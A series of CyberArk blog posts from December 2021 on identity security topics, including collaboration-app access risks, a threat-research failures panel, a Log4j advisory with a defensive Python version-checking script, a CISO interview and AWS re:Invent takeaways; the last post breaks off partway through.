Workforce Trends to Watch in 2022: What Attackers Want from Collaboration Apps https://www.cyberark.com/blog/workforce-trends-to-watch-in-2022-what-attackers-want-from-collaboration-apps/ Thu, 23 Dec 2021 16:21:40 +0000 https://www.cyberark.com/?p=126045 Workforce trends 2022

In a pandemic-altered business world, one of the most striking developments that’s still unfolding is the global movement of workers rethinking what matters most — in work, life and everywhere in between.

Some call it the Great Resignation: The Labor Department said a stunning 4.2 million U.S. workers quit their jobs in October 2021 alone. Others call it the Great Reconsideration: A Harris Poll found that more than half of U.S. workers want to leave their jobs, with 76 percent citing a need for flexibility in how, when and where they work.

Either way, the pace and magnitude of employee turnover is unprecedented, and that’s affecting organizations’ strategies at every level — culture, operations, technology and, of course, security. In response, organizations are scaling up their efforts to find, hire and integrate new talent with a constant focus on empowering workers with the tools to thrive.

During such change, the only constant seems to be the need to make sure work-from-anywhere employees are up and running on the right applications, devices and systems with the right level of access. And on the flip side, it means being able to shut off access quickly and at scale to protect corporate assets amid personnel changes.

Exploring the role of virtual collaboration apps — and their inherent risks

According to Gartner®, nearly 80 percent of workers are using collaboration tools for work in 2021, up from just over half of workers in 2019.[1] If you’re working remotely some or all the time, collaboration tools are the primary means of interacting with co-workers, performing job duties and, in turn, driving your career forward. This includes mainstays such as Slack, Teams and Zoom that are used across industries and professions.

The trouble is that all these changes — while full of opportunity — also open the door to new threats. Every time an organization deploys any type of application to help workers do their jobs, the result is more identities to secure.

Here’s a snapshot of some interrelated access management workforce trends we’ll continue to see in 2022.

Fast turnover + remote work = trouble in assigning and revoking workers’ access

Every time a new worker enters the company or an existing one leaves, it’s another identity lifecycle management challenge for HR and IT to solve. Incoming talent needs new accounts and quick access to a range of critical applications. Meanwhile, organizations need to shut off most access for outgoing talent — and every time somebody falls through the cracks, productivity and/or security can take a hit.

Collaborative tools empower remote workers but also create new security headaches

Imagine a scenario in which a worker gives two weeks’ notice but then (with an eye toward getting a head start at a new job) retrieves a few files from a collaboration app’s shared folders. The employee isn’t planning to use any proprietary information after leaving the company — just some key points and slide templates.

But for some reason, weeks pass, and the now-former employee’s access still hasn’t been revoked. They can just dip in and retrieve old files whenever they want.

What could the harm be?

For starters, who’s managing the former employee’s credentials for the application? Not the employee, who’s moved on to a new company and is no longer getting monthly emails from their old IT team requiring password updates. And not the former employer, who’s unaware of the employee’s lingering access and — for the sake of this hypothetical scenario — doesn’t know the password for this application was weak, easy to guess and reused across various accounts.

This lax approach to passwords is all too common and reflects a prime target for today’s attackers. Indeed, 97 percent of security leaders say end-user credentials make up the largest increase in attacks against their organizations. Relevant to the above example, cyber criminals look for dormant application accounts and stale privileges, which are security lapses that high workforce turnover can intensify.

Collaboration apps, in the wrong hands, can be the entrance to a virtual goldmine.


How to get ahead of converging workforce trends in 2022 and beyond

Even when collaboration apps with functions such as real-time chatting or video conferencing are deployed and work smoothly, they aren’t always fortified properly against malicious actors. A single failure in this area can translate to a world of difficulties by giving attackers a foothold from which to collect sensitive information or move on to other resources.

For IT and security leaders, it’s a good time to think about ways to update access management strategies to reflect the ever-changing workforce. Here are three areas to consider:

  1. In times of high turnover, employ AI and automation to make the tasks of granting, adjusting or revoking a worker’s access … well … more workable. This includes onboarding and offboarding, as well as career moves that not only change a worker’s job function but also the types of access they should (and shouldn’t) have within a collaboration application.
  2. Secure identities holistically by applying protection and transparency to not only the initial point of authentication but also to users’ activity within application sessions. This includes recording, monitoring and auditing activity in applications where users can take high-risk actions with high-value resources.
  3. Lastly, protect the wide range of endpoints that a distributed workforce now uses to gain access to applications, systems and data from distributed locations. This includes desktops, laptops and devices used at home, in the office and in public locations.

Final thoughts: Securing your workforce in times of constant change

Organizations have a major opportunity to empower their employees with applications that help them drive success for key initiatives, including apps that foster collaboration, creativity and a sense of community. The key is ensuring that your users’ engagement with these tools is secure — from the point of authentication, to the actions they take within the apps — and that their access is up to date, in light of any changes to their jobs.

In a world in which the so-called “future of work” is really anybody’s guess, we can count on the fact that every home office will be its own IT infrastructure, and the corporate perimeter requiring protection is essentially limitless, embedded into every identity. Getting ahead of the security risks of trends like the Great Resignation isn’t just forward thinking; it’s critical to securing your distributed workforce.

Read our new eBook “4 Global Workforce Trends Influencing Identity and Access Management Strategies” for insights on how to secure and empower your workforce.


[1] Gartner Press Release, “Gartner Survey Reveals a 44% Rise in Workers’ Use of Collaboration Tools Since 2019,” August 25, 2021. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

]]>
When Threat Research Goes Wrong: Spectacular Screwups and What to Learn from Them https://www.cyberark.com/blog/when-threat-research-goes-wrong-spectacular-screwups-and-what-to-learn-from-them/ Tue, 21 Dec 2021 20:13:20 +0000 https://www.cyberark.com/?p=126018 When Threat Research Goes Wrong

Threat researchers on the cutting edge of cybersecurity have a certain kind of drive — almost a relentless need — to get into the attacker’s mind, solve the “unsolvable” challenge and expose emerging attack techniques. So, it’s not every day these elite researchers come together to share the secrets to their success, and it’s even less common to hear about their failures. But that’s exactly what happened at the inaugural INTENT Security Research Summit last month.

In one of the most popular sessions of the virtual event moderated by Erez Yalon, head of research at Checkmarx, security researchers from Intezer Labs, Claroty, CyberArk Labs and Palo Alto Networks got candid about times when things didn’t go exactly as planned, what they learned from these “spectacular screwups” and how their stories can benefit the global research community at large.

Never assume

One skipped step in a protocol stack vulnerability research project taught Sharon Brizinov, principal, vulnerability research, at Claroty, to never assume that which is incapable of proof. He shared how making one erroneous assumption led to a foiled project, pushback from a vendor who couldn’t reproduce the exploit he developed, and a close examination of existing research processes and procedures to make sure similar mistakes didn’t happen again.

Eran Shimony, senior vulnerability researcher at CyberArk Labs, recounted a time when he uncovered a supposed bug as part of his ongoing research on local privilege escalation vulnerabilities. After a week of reverse engineering and developing the exploit, he responsibly disclosed the flaw to the vendor. It was only after the vendor came back a few weeks later saying they were having difficulty running the exploit that he realized he had inadvertently designed it using admin privileges, making those “very cool bugs in the kernel” much less of a security issue.

Normalize failures

“Even though you never read about researchers’ failures on Reddit, Twitter and in other research publications, they are there,” said Brizinov. And not sharing these failures can create negative ripple effects such as survival bias, when research gets distorted because less-than-stellar results are overlooked or omitted altogether, he noted.

Sure, it can be humbling to admit your mistakes, but research is all about trial and error. “We all fail on a daily basis; it’s part of the job,” said Ari Eitan, VP of research, Intezer Labs. The more comfortable security researchers become with sharing their mistakes, the less they’ll be viewed as “mistakes” at all.

“The more we see others going through similar struggles — and experiencing similar failures — the more encouraged we’ll be to keep working hard to achieve our goals,” echoed Shimony.

Beat to the punch

Eitan recalled a time his team believed they had discovered a new ransomware sample. They dug deeper and ultimately decided to publish their research. After all, “there’s no benefit to having intel and keeping it to yourself,” he said. “But we took our time.” Little did they know another research team was working on the same thing. “Just two hours before our research launched, another vendor published findings on the exact same ransomware sample, just with a different name.”

Irena Damsky, director of research at Palo Alto Networks, shared a similar story from years ago at a previous research job. After identifying a threat vector, her team reached out to several other vendors to combine threat data and develop visualizations of the threat around the world. Each vendor planned to publish their research in tandem to maximize attention, but thanks to a time zone mix-up, her team’s research didn’t get published until later in the day. “Things happen,” she noted, but especially when it comes to major research, “automate processes whenever you can” to help make sure nothing gets left to chance.

Let it go

It’s easy to learn from our own failures, but what happens when someone else is to blame?

Shimony shared a story in which he had disclosed a vulnerability to a vendor, and the vendor had privately confirmed that the flaw would be published as a CVE. Instead, the bug was patched but never acknowledged — and the vendor stopped responding to his follow-up emails. “There are instances when vendors don’t play by the rules, or even pull the ‘legal card,’ when they shouldn’t,” he noted.

The panel agreed some of the best things to do in such circumstances are to continue following all responsible disclosure protocols, not get overly discouraged when others don’t play “fair,” make sure your research is written clearly and can be understood by non-technical audiences, and ensure that all content goes through rigorous reviews by marketing, legal and product teams before publication.

The panel also stressed the importance of cultivating environments in which employees and team members are comfortable admitting to their mistakes — and empowered to learn from them without fear of criticism or consequence.

Learn from the process

Thomas Edison once said, “I have not failed. I’ve just found 10,000 ways that won’t work.”

Failure can lead to ultimate success and discovery, but it’s human nature to want to keep those setbacks to yourself. But the panel’s ultimate message was to push past this because there’s much to be learned from the imperfect process itself. Damsky credited her high school math teacher for instilling this important lesson. “The final answer to the question is not the most important thing — it’s also about how you get there and what you learn along the way,” she said.

]]>
Log4j: What to Know. What to Do. And How to Stay Ahead https://www.cyberark.com/blog/log4j-what-to-know-what-to-do-and-how-to-stay-ahead/ Thu, 16 Dec 2021 23:34:19 +0000 https://www.cyberark.com/?p=125754 Log4j-Vulnerability

In December 2020, a series of network breaches was reported in rapid succession — the beginning of what soon became known as the cyber attack that changed everything. By compromising identities and abusing privileges to take advantage of a routine software update, the sophisticated adversaries behind the landmark SolarWinds attack reached into more than 18,000 organizations, showing the world just how devastating a supply chain attack could be. Almost exactly a year later, the world faces a new threat of potentially equal — or even greater — proportions: the Log4j vulnerability that is putting “hundreds of millions of devices” at risk, according to U.S. CISA officials.

Here’s what you need to know about Log4j and six Identity Security best practices your organization should follow to reduce risk.

The Lowdown on Log4j: What You Need to Know About the Zero Day

On December 10, 2021, a critical security vulnerability in a widely used open-source software development library called Log4j (also referred to as “Log4Shell”) was published as CVE-2021-44228. Affecting Log4j versions 2.0-beta9 to 2.14.1, the flaw has the potential to cause data exfiltration and/or remote code execution on servers using this component for their logging functionality.

Log4Shell has quickly gained global attention because of its potential for far-reaching impact. The Log4j open-source software is ubiquitous, used either directly or indirectly (via third-party code) in the world’s most popular consumer applications and enterprise services. When left unmitigated, the remote code execution (RCE) vulnerability can enable an attacker to execute arbitrary Java code and take control of a target server.

Attackers reportedly began exploiting the vulnerability at the beginning of December 2021 (though it was inserted into the code in July 2017) and have ramped up efforts since the CVE’s publication — efforts include those by known ransomware groups.

Log4j Exploit Explained

Six Identity Security Best Practices to Reduce Log4Shell Risk

There are many ways in which attackers can leverage the Log4j vulnerability for nefarious purposes. And while there is no one vendor or tool that can completely prevent every arbitrary code execution attempt every time, these are steps organizations can take to protect identities, secure privileged access and minimize risk:

  1. Apply patches. If you haven’t already, take immediate steps to apply the software update already released by Apache in Log4j. It’s also important to review vendor recommendations and updates for all enterprise software platforms in use, along with any underlying OS and enterprise integrations. Check in with all your third-party vendors to make sure they’ve also patched the software you use.
  2. Deploy peripheral defenses. Apply web application firewall (WAF) rules to mitigate common exploitation attempts as part of a comprehensive defense-in-depth strategy.
  3. Protect the credentials served to servers. Restrict access to environment variables and local credentials stored in CI/CD pipelines to minimize immediate risks posed by opportunistic attackers. If an application requires that a secret be handed over in an environment variable, use a secrets manager to help ensure only authenticated users get access to the clear-text secrets.
  4. Protect Tier 0 assets. Only allow privileged access to specific bastion hosts to restrict access to Tier 0 assets like Active Directory and DevOps workflow orchestrators. This will make it exponentially more difficult for the attacker to escalate privileges and achieve a complete network compromise.
  5. Implement least privilege for both services and users. This step is critical in mitigating the risk of a targeted attack. Restricting access to the minimum level needed — and taking it away as soon as it’s not needed — can go a long way in slowing down or halting an attacker’s progress by preventing lateral movement, and ultimately, minimizing the blast radius (or overall impact).
  6. Enable Multi-Factor Authentication (MFA) whenever possible. Attackers are much more likely to succeed when they don’t have to provide a second authentication factor or another piece of approval to insert their code — so this is always a best practice.
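Step 1 starts with knowing which of your deployed artifacts actually fall inside the affected range. The following inventory check is an added example, not CyberArk’s code or tooling: it takes the affected range as the post states it (2.0-beta9 through 2.14.1, inclusive, with the upper bound kept as a parameter so it can be moved), orders pre-release tags such as `beta9` correctly before the final release, and scans a constructed list of Maven-style `group:artifact:version` coordinates like those an SBOM or dependency listing would produce. Scoping the check to the `log4j-core` artifact is an assumption made here, not something the post states.

```python
"""Flag Log4j 2 artifacts whose version falls inside the affected range.

Added example for this post; not CyberArk's code. Assumes the affected
range given in the post (2.0-beta9 .. 2.14.1) and constructed sample data.
"""
import re

# Pre-release tags sort before the final release of the same numeric version:
# 2.0-alpha1 < 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1
_PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL_RANK = 3
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE
)

# Affected range as stated in the post; treat the upper bound as a parameter,
# since later advisories may move it.
AFFECTED_LOW = "2.0-beta9"
AFFECTED_HIGH = "2.14.1"


def parse_version(text):
    """Turn a Log4j version string into a tuple that compares correctly.

    '2.0-beta9' -> (2, 0, 0, 1, 9); '2.14.1' -> (2, 14, 1, 3, 0).
    Raises ValueError on strings that do not look like a Log4j 2 version.
    """
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch, tag, tag_num = match.groups()
    numeric = (int(major), int(minor), int(patch or 0))
    if tag:
        return numeric + (_PRERELEASE_RANK[tag.lower()], int(tag_num or 0))
    return numeric + (_FINAL_RANK, 0)


def is_affected(version, low=AFFECTED_LOW, high=AFFECTED_HIGH):
    """True if `version` lies inside [low, high], inclusive at both ends."""
    return parse_version(low) <= parse_version(version) <= parse_version(high)


def find_affected(coordinates, low=AFFECTED_LOW, high=AFFECTED_HIGH):
    """Return the log4j-core coordinates whose version is in the affected range.

    Assumption made here: only the log4j-core artifact is checked; log4j-api,
    the separate Log4j 1.x artifact and unrelated dependencies are skipped.
    Malformed version strings are reported rather than silently ignored.
    """
    hits = []
    for coord in coordinates:
        group, artifact, version = coord.split(":", 2)
        if artifact != "log4j-core":
            continue
        try:
            if is_affected(version, low, high):
                hits.append(coord)
        except ValueError:
            hits.append(f"{coord}  # could not parse version, review manually")
    return hits


# Constructed sample inventory, not real project data.
SAMPLE_INVENTORY = [
    "org.apache.logging.log4j:log4j-core:2.14.1",
    "org.apache.logging.log4j:log4j-core:2.0-beta9",
    "org.apache.logging.log4j:log4j-core:2.0-beta8",
    "org.apache.logging.log4j:log4j-core:2.15.0",
    "org.apache.logging.log4j:log4j-api:2.14.1",
    "log4j:log4j:1.2.17",
    "com.example:widget:3.1.0",
]

if __name__ == "__main__":
    for hit in find_affected(SAMPLE_INVENTORY):
        print("AFFECTED:", hit)
```

Feed the function the output of your own dependency listing; an empty result means nothing in the scanned inventory is inside the stated range, not that transitive copies elsewhere on the host are patched.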

CyberArk Endpoint Privilege Manager can help organizations protect their environment and mitigate Log4j vulnerability impact using advanced application control policies. Explore our technical documentation for details. For additional Log4j mitigation guidance, watch this on-demand webinar hosted by CyberArk Research Evangelist Andy Thompson. To learn how CyberArk is securing our own products against Log4j and other threats, please visit our Trust Center here. 

]]>
CISO Spotlight: Highmark Health’s Khawaja on Creating a Security-First Culture https://www.cyberark.com/blog/highmark-health-ciso-khawaja-security-first-culture/ Tue, 14 Dec 2021 14:25:27 +0000 https://www.cyberark.com/?p=125552 Highmark Health Omar Khawaja CISO Spotlight

Healthcare providers on the front lines are utilizing new approaches and technology to deliver personalized experiences that improve patient care and outcomes. For Omar Khawaja, chief information security officer at Highmark Health, this “people-first” philosophy is also central to driving transformation and security-first consciousness across one of the largest integrated health delivery and financing networks in the United States.

Khawaja recently made a guest appearance on our CyberTalk with CyberArk podcast, hosted by Cybercrime Magazine, where he reflected on navigating changes throughout the pandemic; the intersection of security, culture and measurement; and Highmark Health’s Zero Trust philosophy.

Following are some highlights from this popular episode.

 

Working as a team involves understanding when and how to be flexible. At the height of the COVID-19 pandemic, security organizations were forced to make significant and lasting changes. 

Khawaja described how his team has adapted in the face of pandemic-driven uncertainty.

“As was the case with organizations everywhere, it started with a very significant overdose of uncertainty. We went home and told our teams to do the same, thinking it would be for a few weeks. Then we thought it would be a few months. And then, we changed the question from ‘when are we going back to normal’ to ‘let’s figure out what the new normal is.’”

He also shared important lessons he’s personally embraced along the way, including the power of communication and empathetic leadership.

“During those initial months, I felt one of the biggest things I needed to do was show up with more humility. I’m used to having the answers — or being able to find them — for my team, and for the business. But in this case, no one had answers. The only option was to show up and be transparent, explaining what we knew, what we didn’t know, what questions and problems we were working to solve, and how we were going about that.”

He continued, “When you’re going through a difficult time — and definitely during a crisis — ongoing communication is critical. I went from holding a quarterly town hall with my team members to hosting weekly sessions to engage with them more frequently. Here we are, 80-plus-weeks later, and we’re still doing them. It’s not about project updates or security or risk; it’s about our team — how we’re working together, how we can prevent burnout, how we can support and care for one another.”

Yet Highmark Health is no stranger to change. With a long history of successful mergers and acquisitions, the organization spans more than 35,000 employees covering the insurance needs of more than 6 million members today. Through this rapid growth, Highmark Health continues to execute its mission to create remarkable health experiences, freeing people to be their best. But it also opens the door to new cyber threats. Khawaja discussed the challenges — and opportunities — that come with the territory and the importance of keeping the “big picture” in mind.

“The security function exists to support the business. When the business wants to expand and deliver to the needs of our communities and customers, that’s an extremely positive thing. For our team, it’s about rethinking how we deliver security — from threat detection to privileged access management to data loss prevention — at 10X, 20X the scale and do it in 60, 70, 80 or even 90 percent less time.”

He continued, “We’re focused on using lots of automation to work smarter — stepping back to realize we’re going to have this happen hundreds of times and reimagine certain parts of the security program to be able to deliver at scale and meet the needs of the customer. And a lot of that means even closer alignment with the business.”

Bridging both healthcare and insurance, Highmark Health must continuously safeguard an ever-expanding trove of sensitive customer data — the ultimate asset. In recent years, as the organization has accelerated its move to the cloud, the team has embraced Zero Trust as a common architecture and overarching mindset as it works to protect sensitive data and assets.

“Zero Trust is part of our DNA — one of the four pillars of our security program. But it’s not about implementing technology — it’s more about operating security with Zero Trust in mind. We look to reduce the amount of access individuals have; we don’t trust everyone who attempts to connect to our systems; and we assume that users are connecting from end user devices that are already infected. Certainly, in the case of increasing ‘work from home’ programs — what we call “work from anywhere” in our world — philosophies like Zero Trust are very applicable.”

For a successful cybersecurity program to take hold, a security-first consciousness must extend to individual members of the organization. The 2021 Verizon Data Breach Investigations Report found that 85% of data breaches involve a human element, but it’s not for lack of awareness. Everyone knows they shouldn’t share passwords or click suspicious links, but how well does that knowledge translate?

“It’s not enough to say everyone should take annual security training or just do phishing exercises. The problem with training is that everyone leaves thinking that it applies to others first. It’s not very actionable because it doesn’t tell us how we’re doing. We all think we’re doing well in the absence of specific feedback to tell us otherwise.”

He continued, “Everyone is already aware of the basics of cyber hygiene. But when an incident occurs, the individuals involved almost always say, ‘I should have been more careful.’ The issue is not a lack of awareness or knowledge. It’s about changing behavior, and training is just one tool to accomplish that.”

Highmark Health’s implementation of a “cyber score” program has deeply ingrained security into organizational psychology. Rather than merely creating awareness, this measurement provides each individual employee with feedback on their own security practices. With real, actionable feedback, employees are empowered to make improvements to their individual behavior.

“(Management consultant, educator and author) Peter Drucker was right when he said, ‘what gets measured gets managed.’ If we don’t have a way of measuring human risk, it’s really challenging to effectively manage it.” He continued, “It’s all about value realization, and in this case, we’re focused on changing the culture.

“Most theories of change management tell us that the single most effective person to influence any individual in an enterprise is not the CEO — it’s their direct supervisor. So, with that understanding, I’m focused on arming every single individual manager to be able to have that conversation with the people who report to them. Because they’ve got more influence on the people who report to them than anyone else in the organization.”

The Highmark Health cyber score program has empowered managers at every level of the organization to initiate conversations about security. Khawaja also noted that when managers and employees have sufficient feedback and feel empowered regarding their security choices, real change blossoms.

“Over 10,000 people in our enterprise completed security training — not because I made them, or their boss made them, or compliance made them, but simply because they wanted to improve their cyber score. Culture changes are based on each individual changing.”

The advent of Highmark Health’s innovative cyber score program isn’t your average security training: it meets individual employees where they are and motivates them to change their patterns of behavior. If we truly want users to embrace security as a mindset and lifestyle, we must take the time to understand what makes them tick — and partner closely with business stakeholders to drive engagement and meaningful change.

Editor’s Note: Answers have been edited for length and clarity. Access the full interview here — or wherever you get your podcasts. 

Cloud Identity Security – Key Themes from AWS re:Invent 2021 https://www.cyberark.com/blog/cloud-identity-security-key-themes-from-aws-reinvent-2021/ Fri, 10 Dec 2021 14:28:09 +0000 https://www.cyberark.com/?p=125530 AWS reInvent Cloud Security Takeaways

Last week, CyberArk attendees from around the world joined the global cloud computing community in Las Vegas for AWS re:Invent 2021.

This year’s landmark, 10th-annual conference focused on cloud-hosted services’ critical role in transforming industries — from airlines to financial services to government. In his keynote, AWS CEO Adam Selipsky noted that “there’s no industry that hasn’t been touched by the cloud.” The full conference illustrated how everything from the cloud-hosted applications enabling remote work to the cloud-hosted infrastructure powering vaccine development has built the foundation for contemporary times.

But the distributed nature of modern computing has led to a proliferation of identities with access to public cloud resources. In highly dynamic, rapidly scaling environments, enabling secure access for all human and machine identities is increasingly important. As AWS CTO Werner Vogels said in his keynote, “Protecting your customers should forever be your No. 1 priority.”

The following are some of the key security trends and topics gleaned from the conference’s keynotes and sessions — and from the expo floor itself.

Three key security themes from re:Invent 2021:

1) Technology is changing; the need for least privilege is not.

AWS is innovating at a blistering pace; at re:Invent alone, the company introduced more than 50 new features for its portfolio of services.

At the conference, AWS highlighted that consistently securing access to these powerful technologies requires organizations to implement least privilege access — helping to ensure that all human and machine identities possess only the minimum necessary permissions to complete their tasks.

Through dedicated sessions on implementing least privilege with AWS Identity Services and hyper-focused sessions on security for next-gen infrastructure such as serverless functions, AWS experts stressed the need for thorough authorization and authentication controls.

Another telling detail illustrating how central least privilege and other Identity Security controls are to AWS and the philosophy of its practitioners was on display in the re:Invent security leadership session: AWS Identity’s principal product manager presented a photo of her vanity license plate, which reads “USE MFA.” Yes, it’s a driving force.

2) Shift left: simple, automated security for modern infrastructure

At the scale of the modern enterprise, consistent security is essential. In his keynote, Vogels emphasized the need for straightforward security policies that can reach hyperscale, providing the “under-the-hood” example of AWS Identity and Access Management (IAM) handling more than a half billion API calls per second. Any service operating at that scale would have once been unfathomable. Not in 2021.

Vogels said, AWS needs “… to keep simplicity in mind because, otherwise, you cannot [reach] the scale IAM needs to meet.” He also noted the foundation for this principle is Gall’s law — which states that all complex systems that work evolved from simpler systems that worked.

Sessions and announcements throughout the conference echoed the connection among automation, scalability and security.

Additionally, several sessions positioned infrastructure-as-code (IaC) deployment methods like AWS CloudFormation as the key to automating simple, scalable and secure configurations for new environments and services.

For example, one session titled, “Best practices for securing your software delivery lifecycle,” underscored the importance of enforcing both security in the CI/CD pipeline (through tools like secrets management and application vulnerability scanning) and security of the pipeline (through ongoing monitoring and threat detection). This language, of course, deeply echoes the AWS shared responsibility model that underpins the provider’s security philosophy.

Another popular session focused on the role of automation in both generating and validating appropriate IAM policies on the fly within CI/CD pipelines. Collectively, these sessions and details indicate a future in which least privilege access and just-in-time provisioning will remain essential ingredients in cloud security.

Automation is even more important as AWS continues to, yes, reinvent enterprise infrastructure. AWS continues to make container-based and serverless deployments increasingly accessible — and increasingly secure. Several AWS services, including Amazon Redshift (big data) and Amazon SageMaker (machine learning), added serverless deployment options at re:Invent, lowering the total cost of ownership for these groundbreaking technologies.

Simultaneously, AWS used the re:Invent spotlight to make adoption of containerized environments easier than ever before. The company introduced a new AWS Marketplace for Containers, which enables organizations to identify and deploy subscriptions to third-party Kubernetes applications. And following its own advice, AWS also pre-announced that its Amazon GuardDuty threat detection service will extend into containerized environments.

3) Securing cloud migrations requires people, processes and technology

Securing all identities accessing sensitive resources during a cloud migration is no easy task. It requires deep expertise, tailored technologies and careful planning. This message resonated throughout our meetings with CyberArk customers and peers at AWS, who repeatedly called back to the AWS Migration Acceleration Program (MAP).

MAP emphasizes the importance of assessing cloud readiness, mobilizing resources and technologies, and ultimately, migrating and modernizing workloads with the help of expert partners.

In the re:Invent Security Leadership session, AWS leaders emphasized the importance of people, processes and technology for all cloud security processes. The company even spotlighted its own security culture and teams to demonstrate some cybersecurity best practices in action, including:

  • Investing heavily in employee education on cybersecurity awareness training (people)
  • Consistently verifying least privilege and reviewing unintended access to company resources — both technological and physical (processes)
  • Widely investing in threat detection and consistent monitoring that covers all identities accessing cloud resources (technology)

Want to learn more about the value that CyberArk Identity Security Platform can quickly add to your cloud migration? Check out our listings on AWS Marketplace.

Simplify Identity Security with this How-to Guide (for Dummies) https://www.cyberark.com/blog/simplify-identity-security-with-this-how-to-guide-for-dummies/ Wed, 08 Dec 2021 14:25:52 +0000 https://www.cyberark.com/?p=125303

In season three of The Office, prankster Jim Halpert impersonates his coworker Dwight in what has become one of the show’s most iconic cold opens. While Jim only intends to tease, his prank is more poignant than he perhaps realizes. Together, we all learned from Dwight that “identity theft is not a joke” (and that bears don’t eat beets). We may have laughed then, but it’s true — especially when it comes to the “perimeterless” enterprise networks and cloud-based technologies and services empowering most digital enterprises today.

But first, let’s start with a definition. In the enterprise sense, when we talk about a “digital identity,” we’re talking about someone or something associated with an organization. That could mean an employee or customer or partner — or it could mean a non-human device, application or even a bot. There are also policies attached to a digital identity to describe the level of access that particular entity has to company resources and sensitive data.

Converging trends such as the adoption of SaaS, public cloud-based tools and flexible work-from-home policies have dramatically increased the numbers and types of identities within organizations. This explosive growth has created a host of new Identity and Access Management (IAM) challenges, prompting a surge in identity-related data breaches and necessitating a shift in how companies approach cybersecurity at a fundamental level. The convergence of these trends has given rise to the need for Identity Security. Identity Security is a holistic, risk-based approach to securing human and machine identities to protect sensitive enterprise applications, infrastructure and data. It offers a set of technologies that are foundational to achieving Zero Trust — a popular cybersecurity framework requiring every identity, whether internal or external, to be authenticated and authorized before access is granted.

“Zero Trust” and other popular industry phrases like “assume breach” and “defense-in-depth” are often associated with Identity Security-related topics, but understanding how they’re all connected can be tricky. Even IAM teams often say they could use some help in communicating the importance and inner workings of Identity Security in ways that various stakeholders can easily understand.

That’s why a simple how-to guide can come in handy and why we recently published our own version of the popular “For Dummies” book series. Highlighting plenty of real-world examples without the technical jargon, “Identity Security for Dummies” aims to make this important security topic more approachable.

Download it, bookmark it, even print it out (if that’s still your thing) — and refer to it whenever you’re looking for simple definitions and quick answers. For instance, you can dig into these six actionable steps for accelerating your Identity Security program:

1. Prioritize your Identity Security landscape

Most cyber attacks begin with identity compromise. After acquiring a valid set of credentials for an identity, attackers often work to uncover new levels of access — or “escalate privileges” — by targeting privileged accounts that open doors to IT systems, public cloud infrastructure, business applications, sensitive data and more.

While privileged accounts are often the No. 1 target for attackers, many organizations are unaware of the volume and location of privileged accounts throughout their IT environments. And on a very basic level, it’s tough to protect what you can’t see — or don’t even know about.

Implementing a successful Identity Security program starts with taking inventory of privileged accounts, credentials and misconfigurations that can create risk, and making note of what systems and data are most likely to be targeted. Once those have been identified, take stock of who (or what) has access to those high-risk assets.

Prioritize securing the most important things first — that means protecting the data most sensitive to your organization. Then you can work toward those assets that are less sensitive. Keep in mind that attackers may attack at a slant — looking for a foothold that they can use to pivot to bigger and better things.

2. Identify potential “new” targets

Once existing highest-priority assets are protected, then you can start planning for the future. That includes following where the logins are coming from and monitoring processes and procedures (both manual and automatic). Analytics and automation can be extremely helpful when it comes to sifting through logs associated with sensitive applications to understand who or what accessed what resource, when, for how long and for what purpose — helping you avoid the overwhelm of “analysis paralysis.”

3. Implement effective Multi-factor Authentication 

Multi-factor Authentication (MFA) is an important control to help keep an identity from becoming compromised. However, MFA itself is not perfect. End users can still be tricked, no matter how well they paid attention to the last security training.

There are ways to tighten up MFA to help reduce the risk and keep it effective, including tools like biometrics (fingerprint or face recognition, for instance), push notifications on smart devices, device certificates (digital identifiers on approved devices) and more. Reducing manual password use not only increases the strength of security, but it also creates seamless logins for users — an operational and security win.

4. Protect high-risk access with Privileged Access Management

As organizations embrace cloud, DevOps, automation, IoT and more, the need for protecting privileged access continues to grow. Privileged Access Management (PAM) solutions are used to limit risk regarding infrastructure and administrative access to sensitive applications, systems and data. PAM solutions help manage, monitor and control access so that identities — human or machine — only have enough access to do what they are meant to do — nothing more, nothing less.

5. Allow just enough access to get things done

Privileged Access Management programs dovetail into a least privilege, Just-In-Time (JIT) approach for privileged access. JIT combines the concept of least privilege access with a time-based element. Users have the proper permissions and access for only a specific amount of time to resources necessary to do their job.

6. Motivate cultural change

Embracing an Identity Security approach on the path to Zero Trust isn’t just a “one and done” program. It’s also a mindset and requires a cultural shift that demands involvement and action from stakeholders beyond traditional IT infrastructure and security teams.

While quick action and risk reduction can be attained, deploying comprehensive Identity Security controls across mid- to large-sized organizations will happen in iterations, calculated and prioritized based on your greatest risks.

Communication and Organizational Change Management (OCM) are key for Identity Security programs to succeed — and support must come from the top. Beyond communicating security benefits, users should understand how Identity Security can benefit their daily work lives and improve operations while reducing risk.

Identity Security for Dummies

So, where to begin with Identity Security? Zero Trust provides a strategic lens to evaluate where your organization stands today. And whether you’re just getting started on your Identity Security journey or taking your program to the next level, “Identity Security for Dummies” can help drive focus and overall progress toward your goals. With everyone looking through the same lens, you can determine the strength of your posture and come up with your next move. We suspect Dwight Schrute would approve.


Cybersecurity Trends for 2022: The Roots of Attacker Innovation https://www.cyberark.com/blog/cybersecurity-trends-for-2022-the-roots-of-attacker-innovation/ Fri, 03 Dec 2021 13:58:44 +0000 https://www.cyberark.com/?p=125229 2020 Cybersecurity Attacker Innovations

The Greek philosopher Heraclitus once said “the only constant is change.” This still rings true thousands of years later — particularly as we reflect on 2021, another year marked by continued shifts that pushed enterprises to adopt new strategies to strengthen resilience. Similarly, adversaries continued to refine their methods to work smarter and move faster to scale attacks, extend deeper into supply chains and cause greater damage.

The CyberArk Labs team has observed early glimpses of evolving attacker innovation; each has the potential to significantly alter the cybersecurity landscape over the next 12 months.

Innovation 1: Underground Enterprises Will Get Caught at Their Own Games, Forcing a Security Revamp

DevOps is changing the way business is done, and underground criminal enterprises are certainly no exception.

Just like legitimate software vendors, attackers are using CI/CD pipelines, cloud infrastructure and other digital technologies to develop and sell new malware as a service (MaaS) offerings. The need to rapidly push new features to market is driven by growing (underground) demand for popular tools like credential theft malware that can be configured to surreptitiously gather user credentials and pillage privileged information from victims. Such malware is not only powerful, but it is also simple to use right out of the box, emboldening novice attackers and strengthening sophisticated nation states alike.

Attacker groups are pulling on strengths from various stakeholders to monetize these services and grow their operations — from developers writing the exploit code, to engineers architecting the attack infrastructure, to attackers using these new exploits in the wild to target victim networks.

